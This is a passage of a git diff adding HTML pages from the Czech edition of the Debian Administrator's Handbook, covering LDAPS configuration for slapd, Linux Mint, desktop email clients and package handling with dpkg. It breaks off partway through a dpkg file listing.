+                  class="varname">SLAPD_SERVICES</code> variable in the <code
+                  class="filename">/etc/default/slapd</code> file. We'll play it safe and disable unsecured LDAP altogether.
+					</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.10.9.5.4.12"></a><p
+                  class="title"><strong>Příklad 11.28. The <code
+                      class="filename">/etc/default/slapd</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+# Default location of the slapd.conf file or slapd.d cn=config directory. If
+# empty, use the compiled-in default (/etc/ldap/slapd.d with a fallback to
+# /etc/ldap/slapd.conf).
+SLAPD_CONF=
+
+# System account to run the slapd server under. If empty the server
+# will run as root.
+SLAPD_USER="openldap"
+
+# System group to run the slapd server under. If empty the server will
+# run in the primary group of its user.
+SLAPD_GROUP="openldap"
+
+# Path to the pid file of the slapd server. If not set the init.d script
+# will try to figure it out from $SLAPD_CONF (/etc/ldap/slapd.conf by
+# default)
+SLAPD_PIDFILE=
+
+# slapd normally serves ldap only on all TCP-ports 389. slapd can also
+# service requests on TCP-port 636 (ldaps) and requests via unix
+# sockets.
+# Example usage:
+# SLAPD_SERVICES="ldap://127.0.0.1:389/ ldaps:/// ldapi:///"
+SLAPD_SERVICES="ldaps:/// ldapi:///"
+
+# If SLAPD_NO_START is set, the init script will not start or restart
+# slapd (but stop will still work).  Uncomment this if you are
+# starting slapd via some other means or if you don't want slapd normally
+# started at boot.
+#SLAPD_NO_START=1
+
+# If SLAPD_SENTINEL_FILE is set to path to a file and that file exists,
+# the init script will not start or restart slapd (but stop will still
+# work).  Use this for temporarily disabling startup of slapd (when doing
+# maintenance, for example, or through a configuration management system)
+# when you don't want to edit a configuration file.
+SLAPD_SENTINEL_FILE=/etc/ldap/noslapd
+
+# For Kerberos authentication (via SASL), slapd by default uses the system
+# keytab file (/etc/krb5.keytab).  To use a different keytab file,
+# uncomment this line and change the path.
+#export KRB5_KTNAME=/etc/krb5.keytab
+
+# Additional options to pass to slapd
+SLAPD_OPTIONS=""
+</pre></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.10.9.5.5"></a>11.7.3.3.2. Configuring the Client</h5></div></div></div><div
+                class="para">
+						On the client side, the configuration for the <span
+                  class="emphasis"><em>libpam-ldap</em></span> and <span
+                  class="emphasis"><em>libnss-ldap</em></span> modules needs to be modified to use an <code
+                  class="literal">ldaps://</code> URI.
+					</div><div
+                class="para">
+						LDAP clients also need to be able to authenticate the server. In a X.509 public key infrastructure, public certificates are signed by the key of a certificate authority (CA). With <span
+                  class="emphasis"><em>easy-rsa</em></span>, the Falcot administrators have created their own CA and they now need to configure the system to trust the signatures of Falcot's CA. This can be done by putting the CA certificate in <code
+                  class="filename">/usr/local/share/ca-certificates</code> and running <code
+                  class="command">update-ca-certificates</code>.
+					</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>cp keys/ca.crt /usr/local/share/ca-certificates/falcot.crt
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>update-ca-certificates
+</code></strong><code
+                  class="computeroutput">Updating certificates in /etc/ssl/certs... 1 added, 0 removed; done.
+Running hooks in /etc/ca-certificates/update.d....
+Adding debian:falcot.pem
+done.
+done.
+</code></pre><div
+                class="para">
+						Last but not least, the default LDAP URI and default base DN used by the various command line tools can be modified in <code
+                  class="filename">/etc/ldap/ldap.conf</code>. This will save quite some typing.
+					</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.10.9.5.5.6"></a><p
+                  class="title"><strong>Příklad 11.29. The <code
+                      class="filename">/etc/ldap/ldap.conf</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">#
+# LDAP Defaults
+#
+
+# See ldap.conf(5) for details
+# This file should be world readable but not world writable.
+
+BASE   dc=falcot,dc=com
+URI    ldaps://ldap.falcot.com
+
+#SIZELIMIT      12
+#TIMELIMIT      15
+#DEREF          never
+
+# TLS certificates (needed for GnuTLS)
+TLS_CACERT      /etc/ssl/certs/ca-certificates.crt
+</pre></div></div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-ftp-proxy.html"><strong>Předcházející</strong>11.6. HTTP/FTP Proxy</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-services.html"><strong>Další</strong>11.8. Real-Time Communication Services</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.linux-mint.html b/tmp/cs-CZ/html/sect.linux-mint.html
new file mode 100644
index 000000000..e8ef792cf
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.linux-mint.html
@@ -0,0 +1,93 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.3. Linux Mint</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.ubuntu.html"
+        title="A.2. Ubuntu" /><link
+        rel="next"
+        href="sect.knoppix.html"
+        title="A.4. Knoppix" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.linux-mint.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ubuntu.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.knoppix.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.linux-mint"></a>A.3. Linux Mint</h2></div></div></div><a
+          id="id-1.20.6.2"
+          class="indexterm"></a><div
+          class="para">
+			Linux Mint is a (partly) community-maintained distribution, supported by donations and advertisements. Their flagship product is based on Ubuntu, but they also provide a “Linux Mint Debian Edition” variant that evolves continuously (as it is based on Debian Testing). In both cases, the initial installation involves booting a LiveDVD.
+		</div><div
+          class="para">
+			The distribution aims at simplifying access to advanced technologies, and provides specific graphical user interfaces on top of the usual software. For instance, Linux Mint relies on Cinnamon instead of GNOME by default (but it also includes MATE as well as Plasma and Xfce); similarly, the package management interface, although based on APT, provides a specific interface with an evaluation of the risk from each package update.
+		</div><div
+          class="para">
+			Linux Mint includes a large amount of proprietary software to improve the experience of users who might need those. For example: Adobe Flash and multimedia codecs. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.linuxmint.com/">http://www.linuxmint.com/</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ubuntu.html"><strong>Předcházející</strong>A.2. Ubuntu</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.knoppix.html"><strong>Další</strong>A.4. Knoppix</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.main-desktop-tools.html b/tmp/cs-CZ/html/sect.main-desktop-tools.html
new file mode 100644
index 000000000..f07ffa6b2
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.main-desktop-tools.html
@@ -0,0 +1,185 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.4. Email</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.graphical-desktops.html"
+        title="13.3. Graphical Desktops" /><link
+        rel="next"
+        href="sect.web-browsers.html"
+        title="13.5. Web Browsers" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.main-desktop-tools.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.graphical-desktops.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.web-browsers.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.main-desktop-tools"></a>13.4. Email</h2></div></div></div><a
+          id="id-1.16.7.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.7.3"></a>13.4.1. Evolution</h3></div></div></div><a
+            id="id-1.16.7.3.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>COMMUNITY</em></span> <span
+                        class="emphasis"><em>Popular</em></span> packages</strong></p></div></div></div><div
+              class="para">
+				Installing the <span
+                class="pkg pkg">popularity-contest</span> package enables participation in an automated survey that informs the Debian project about the most popular packages. A script is run weekly by <code
+                class="command">cron</code> which sends (by HTTP or email) an anonymized list of the installed packages and the latest access date for the files they contain. This allows the Debian maintainers to know which packages are most frequently installed, and of these, how frequently they are actually used.
+			</div><a
+              id="id-1.16.7.3.3.3"
+              class="indexterm"></a><a
+              id="id-1.16.7.3.3.4"
+              class="indexterm"></a><a
+              id="id-1.16.7.3.3.5"
+              class="indexterm"></a><div
+              class="para">
+				This information is a great help to the Debian project. It is used to determine which packages should go on the first installation disks. The installation data is also an important factor used to decide whether to remove a package with very few users from the distribution. We heartily recommend installing the <span
+                class="pkg pkg">popularity-contest</span> package, and participating in the survey.
+			</div><div
+              class="para">
+				The collected data are made public every day. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://popcon.debian.org/">https://popcon.debian.org/</a></div>
+			</div><div
+              class="para">
+				These statistics can also help users to choose between two packages that seem otherwise equivalent. Choosing the more popular package is probably a safer choice.
+			</div></div><div
+            class="para">
+				Evolution is the GNOME email client and can be installed with <code
+              class="command">apt install evolution</code>. Evolution is more than a simple email client: it also provides a calendar, an address book, a task list, and a memo (free-form note) application. Its email component includes a powerful message indexing system, and allows for the creation of virtual folders based on search queries on all archived messages. In other words, all messages are stored the same way but displayed in a folder-based organization, each folder containing messages that match a set of filtering criteria.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.7.3.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/evolution.png"
+                  alt="The Evolution email software" /></div></div><p
+              class="title"><strong>Obrázek 13.4. The Evolution email software</strong></p></div><div
+            class="para">
+				An extension to Evolution allows integration with a Microsoft Exchange email system; the required package is <span
+              class="pkg pkg">evolution-ews</span>.
+			</div><a
+            id="id-1.16.7.3.7"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.7.4"></a>13.4.2. KMail</h3></div></div></div><a
+            id="id-1.16.7.4.2"
+            class="indexterm"></a><div
+            class="para">
+				The KDE email software can be installed with <code
+              class="command">apt install kmail</code>. KMail only handles email, but it belongs to a software suite called KDE-PIM (for <span
+              class="emphasis"><em>Personal Information Manager</em></span>) that includes features such as address books, a calendar component, and so on. KMail has all the features one would expect from an excellent email client.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.7.4.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/kmail.png"
+                  alt="The KMail email software" /></div></div><p
+              class="title"><strong>Obrázek 13.5. The KMail email software</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.7.5"></a>13.4.3. Thunderbird and Icedove</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">thunderbird</span> package provides the email client from the Mozilla software suite. Until <span
+              class="distribution distribution">Jessie</span> Debian contained Icedove and not Thunderbird for legal reasons detailed in the sidebar <a
+              class="xref"
+              href="sect.web-browsers.html#sidebar.firefox-iceweasel"><span
+                class="emphasis"><em>CULTURE</em></span> Iceweasel, Firefox and others</a>. You may find references to Icedove as the switch has been done recently.
+			</div><div
+            class="para">
+				Various localization sets are available in <span
+              class="pkg pkg">thunderbird-l10n-*</span> packages; the <span
+              class="pkg pkg">enigmail</span> extension handles message encrypting and signing, but it is not available in all languages.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.16.7.5.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/thunderbird.png"
+                  alt="The Thunderbird email software" /></div></div><p
+              class="title"><strong>Obrázek 13.6. The Thunderbird email software</strong></p></div><a
+            id="id-1.16.7.5.5"
+            class="indexterm"></a><a
+            id="id-1.16.7.5.6"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.graphical-desktops.html"><strong>Předcházející</strong>13.3. Graphical Desktops</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.web-browsers.html"><strong>Další</strong>13.5. Web Browsers</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.manipulating-packages-with-dpkg.html b/tmp/cs-CZ/html/sect.manipulating-packages-with-dpkg.html
new file mode 100644
index 000000000..4bdd04b35
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.manipulating-packages-with-dpkg.html
@@ -0,0 +1,670 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.4. Manipulating Packages with dpkg</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="sect.source-package-structure.html"
+        title="5.3. Structure of a Source Package" /><link
+        rel="next"
+        href="sect.coexistence-with-other-packaging-systems.html"
+        title="5.5. Coexistence with Other Packaging Systems" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.manipulating-packages-with-dpkg.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.source-package-structure.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.manipulating-packages-with-dpkg"></a>5.4. Manipulating Packages with <code
+                  class="command">dpkg</code></h2></div></div></div><a
+          id="id-1.8.8.2"
+          class="indexterm"></a><div
+          class="para">
+			<code
+            class="command">dpkg</code> is the base command for handling Debian packages on the system. If you have <code
+            class="filename">.deb</code> packages, it is <code
+            class="command">dpkg</code> that allows installation or analysis of their contents. But this program only has a partial view of the Debian universe: it knows what is installed on the system, and whatever it is given on the command line, but knows nothing of the other available packages. As such, it will fail if a dependency is not met. Tools such as <code
+            class="command">apt</code>, on the contrary, will create a list of dependencies to install everything as automatically as possible.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> <code
+                      class="command">dpkg</code> or <code
+                      class="command">apt</code>?</strong></p></div></div></div><div
+            class="para">
+			<code
+              class="command">dpkg</code> should be seen as a system tool (backend), and <code
+              class="command">apt</code> as a tool closer to the user, which overcomes the limitations of the former. These tools work together, each one with its particularities, suited to specific tasks.
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.5"></a>5.4.1. Installing Packages</h3></div></div></div><a
+            id="id-1.8.8.5.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.5.3"
+            class="indexterm"></a><div
+            class="para">
+				<code
+              class="command">dpkg</code> is, above all, the tool for installing an already available Debian package (because it does not download anything). To do this, we use its <code
+              class="literal">-i</code> or <code
+              class="literal">--install</code> option.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.5.5"></a><p
+              class="title"><strong>Příklad 5.2. Installation of a package with <code
+                  class="command">dpkg</code></strong></p><div
+              class="example-contents"><pre
+                class="screen scale">
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>dpkg -i man-db_2.7.6.1-2_amd64.deb</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-1) ...
+Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+Processing triggers for mime-support (3.60) ...</code></pre></div></div><div
+            class="para">
+				We can see the different steps performed by <code
+              class="command">dpkg</code>; we know, thus, at what point any error may have occurred. The installation can also be effected in two stages: first unpacking, then configuration. <code
+              class="command">apt-get</code> takes advantage of this, limiting the number of calls to <code
+              class="command">dpkg</code> (since each call is costly, due to loading of the database in memory, especially the list of already installed files).
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.5.7"></a><p
+              class="title"><strong>Příklad 5.3. Separate unpacking and configuration</strong></p><div
+              class="example-contents"><pre
+                class="screen scale">
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>dpkg --unpack man-db_2.7.6.1-2_amd64.deb</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-2) ...
+Processing triggers for mime-support (3.60) ...
+# </code><strong
+                  class="userinput"><code>dpkg --configure man-db</code></strong>
+<code
+                  class="computeroutput">Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+</code></pre></div></div><a
+            id="id-1.8.8.5.8"
+            class="indexterm"></a><a
+            id="id-1.8.8.5.9"
+            class="indexterm"></a><div
+            class="para">
+				Sometimes <code
+              class="command">dpkg</code> will fail to install a package and return an error; if the user orders it to ignore this, it will only issue a warning; it is for this reason that we have the different <code
+              class="literal">--force-*</code> options. The <code
+              class="command">dpkg --force-help</code> command, or documentation of this command, will give a complete list of these options. The most frequent error, which you are bound to encounter sooner or later, is a file collision. When a package contains a file that is already installed by another package, <code
+              class="command">dpkg</code> will refuse to install it. The following messages will then appear:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">Unpacking libgdm (from .../libgdm_3.8.3-2_amd64.deb) ...
+dpkg: error processing /var/cache/apt/archives/libgdm_3.8.3-2_amd64.deb (--unpack):
+ trying to overwrite '/usr/bin/gdmflexiserver', which is also in package gdm3 3.4.1-9</code></pre><div
+            class="para">
+				In this case, if you think that replacing this file is not a significant risk to the stability of your system (which is usually the case), you can use the option <code
+              class="literal">--force-overwrite</code>, which tells <code
+              class="command">dpkg</code> to ignore this error and overwrite the file.
+			</div><div
+            class="para">
+				While there are many available <code
+              class="literal">--force-*</code> options, only <code
+              class="literal">--force-overwrite</code> is likely to be used regularly. These options only exist for exceptional situations, and it is better to leave them alone as much as possible in order to respect the rules imposed by the packaging mechanism. Do not forget, these rules ensure the consistency and stability of your system.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Effective use of <code
+                        class="literal">--force-*</code></strong></p></div></div></div><a
+              id="id-1.8.8.5.14.2"
+              class="indexterm"></a><div
+              class="para">
+				If you are not careful, the use of an option <code
+                class="literal">--force-*</code> can lead to a system where the APT family of commands will refuse to function. In effect, some of these options allow installation of a package when a dependency is not met, or when there is a conflict. The result is an inconsistent system from the point of view of dependencies, and the APT commands will refuse to execute any action except those that will bring the system back to a consistent state (this often consists of installing the missing dependency or removing a problematic package). This often results in a message like this one, obtained after installing a new version of <span
+                class="pkg pkg">rdesktop</span> while ignoring its dependency on a newer version of the <span
+                class="pkg pkg">libc6</span>:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt full-upgrade
+</code></strong><code
+                class="computeroutput">[...]
+You might want to run 'apt-get -f install' to correct these.
+The following packages have unmet dependencies:
+  rdesktop: Depends: libc6 (&gt;= 2.5) but 2.3.6.ds1-13etch7 is installed
+E: Unmet dependencies. Try using -f.</code></pre><div
+              class="para">
+				A courageous administrator who is certain of the correctness of their analysis may choose to ignore a dependency or conflict and use the corresponding <code
+                class="literal">--force-*</code> option. In this case, if they want to be able to continue to use <code
+                class="command">apt</code> or <code
+                class="command">aptitude</code>, they must edit <code
+                class="filename">/var/lib/dpkg/status</code> to delete/modify the dependency, or conflict, that they chose to override.
+			</div><div
+              class="para">
+				This manipulation is an ugly hack, and should never be used, except in the most extreme case of necessity. Quite frequently, a more fitting solution is to recompile the package that's causing the problem (see <a
+                class="xref"
+                href="debian-packaging.html#sect.rebuilding-package">15.1 – „Rebuilding a Package from its Sources“</a>) or use a new version (potentially corrected) from a repository such as the <code
+                class="literal">stable-backports</code> one (see <a
+                class="xref"
+                href="apt.html#sect.backports">6.1.2.4 – „Stable Backports“</a>).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.6"></a>5.4.2. Package Removal</h3></div></div></div><a
+            id="id-1.8.8.6.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.6.3"
+            class="indexterm"></a><a
+            id="id-1.8.8.6.4"
+            class="indexterm"></a><a
+            id="id-1.8.8.6.5"
+            class="indexterm"></a><div
+            class="para">
+				Invoking <code
+              class="command">dpkg</code> with the <code
+              class="literal">-r</code> or <code
+              class="literal">--remove</code> option, followed by the name of a package, removes that package. This removal is, however, not complete: all of the configuration files, maintainer scripts, log files (system logs) and other user data handled by the package remain. That way disabling the program is easily done by uninstalling it, and it's still possible to quickly reinstall it with the same configuration. To completely remove everything associated with a package, use the <code
+              class="literal">-P</code> or <code
+              class="literal">--purge</code> option, followed by the package name.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.6.7"></a><p
+              class="title"><strong>Příklad 5.4. Removal and purge of the <span
+                  class="pkg pkg">debian-cd</span> package</strong></p><div
+              class="example-contents"><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>dpkg -r debian-cd</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 112188 files and directories currently installed.)
+Removing debian-cd (3.1.20) ...
+# </code><strong
+                  class="userinput"><code>dpkg -P debian-cd</code></strong>
+<code
+                  class="computeroutput">(Reading database ... 111613 files and directories currently installed.)
+Purging configuration files for debian-cd (3.1.20) ...
+</code></pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.8.7"></a>5.4.3. Querying <code
+                    class="command">dpkg</code>'s Database and Inspecting <code
+                    class="filename">.deb</code> Files</h3></div></div></div><a
+            id="id-1.8.8.7.2"
+            class="indexterm"></a><a
+            id="id-1.8.8.7.3"
+            class="indexterm"></a><a
+            id="id-1.8.8.7.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Option syntax</strong></p></div></div></div><div
+              class="para">
+				Most options are available in a “long” version (one or more relevant words, preceded by a double dash) and a “short” version (a single letter, often the initial of one word from the long version, and preceded by a single dash). This convention is so common that it is a POSIX standard.
+			</div></div><div
+            class="para">
+				Before concluding this section, we will study <code
+              class="command">dpkg</code> options that query the internal database in order to obtain information. Giving first the long options and then corresponding short options (that will evidently take the same possible arguments) we cite <code
+              class="literal">--listfiles <em
+                class="replaceable">package</em></code> (or <code
+              class="literal">-L</code>), which lists the files installed by this package; <code
+              class="literal">--search <em
+                class="replaceable">file</em></code> (or <code
+              class="literal">-S</code>), which finds the package(s) containing the file; <code
+              class="literal">--status <em
+                class="replaceable">package</em></code> (or <code
+              class="literal">-s</code>), which displays the headers of an installed package; <code
+              class="literal">--list</code> (or <code
+              class="literal">-l</code>), which displays the list of packages known to the system and their installation status; <code
+              class="literal">--contents <em
+                class="replaceable">file.deb</em></code> (or <code
+              class="literal">-c</code>), which lists the files in the Debian package specified; <code
+              class="literal">--info<em
+                class="replaceable"> file.deb </em></code> (or <code
+              class="literal">-I</code>), which displays the headers of this Debian package.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.8.7.7"></a><p
+              class="title"><strong>Příklad 5.5. Various queries with <code
+                  class="command">dpkg</code></strong></p><div
+              class="example-contents"><pre
+                class="screen scale"
+                width="80">
+<code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>dpkg -L base-passwd</code></strong>
+<code
+                  class="computeroutput">/.
+/usr
+/usr/sbin
+/usr/sbin/update-passwd
+/usr/share
+/usr/share/base-passwd
+/usr/share/base-passwd/group.master
+/usr/share/base-passwd/passwd.master
+/usr/share/doc
+/usr/share/doc/base-passwd
+/usr/share/doc/base-passwd/README
+/usr/share/doc/base-passwd/changelog.gz
+/usr/share/doc/base-passwd/copyright
+/usr/share/doc/base-passwd/users-and-groups.html
+/usr/share/doc/base-passwd/users-and-groups.txt.gz
+/usr/share/doc-base
+/usr/share/doc-base/users-and-groups
+/usr/share/lintian
+/usr/share/lintian/overrides
+/usr/share/lintian/overrides/base-passwd
+/usr/share/man
+/usr/share/man/de
+/usr/share/man/de/man8
+/usr/share/man/de/man8/update-passwd.8.gz
+/usr/share/man/es
+/usr/share/man/es/man8
+/usr/share/man/es/man8/update-passwd.8.gz
+/usr/share/man/fr
